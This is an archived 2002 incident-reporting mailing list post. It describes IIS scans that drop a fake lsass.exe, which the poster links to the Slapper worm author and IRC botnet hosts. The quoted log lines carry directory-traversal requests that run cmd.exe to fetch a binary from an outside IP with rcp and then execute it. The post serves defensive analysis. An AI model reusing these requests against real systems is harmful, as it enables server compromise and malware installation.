I can confirm these scans are appearing on the first host I checked here: 2002-09-16 09:18:10 131.251.27.247 - W3SVC2 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+rcp+-b+64.21.95.7.lp:lsass.exe+. 401 744 96 80 - - 2002-09-16 09:18:11 131.251.27.247 - W3SVC2 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+lsass.exe 401 744 73 80 - - lsass.exe is and has been a longtime component of windows (server anyway). A check finds these sizes normally: 11,776 bytes - Windows XP 33,552 bytes - Windows 2000 Advanced Server 10,000 bytes - Windows NT4 I used rpc to snag a copy. Interesting output in strings includes: telsa5.mine.nu irc.logicfive.nu Googling for the first host finds an interesting match: http://www.esec.dk/Nyheder/1909a2002.htm That site mentions Microsoft IIS server , IRC, Denial-of-Service, zombie and "kumultative hotfix installeret", but that's about all I understand of it ;) Actually, a closer reading seems to reveal that this may be a companion of slapper: "Windows program af Slapper ormens forfatter bruges i angreb" and "Den "Slapper Worm" der for øjeblikket hærger Apache er i kildeteksten signeret af "contem@efnet" altså den samme forfatter eller gruppe." Can anyone translate and shed a little more light on this? Mike ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Sep 23 2002 - 10:22:56 PDT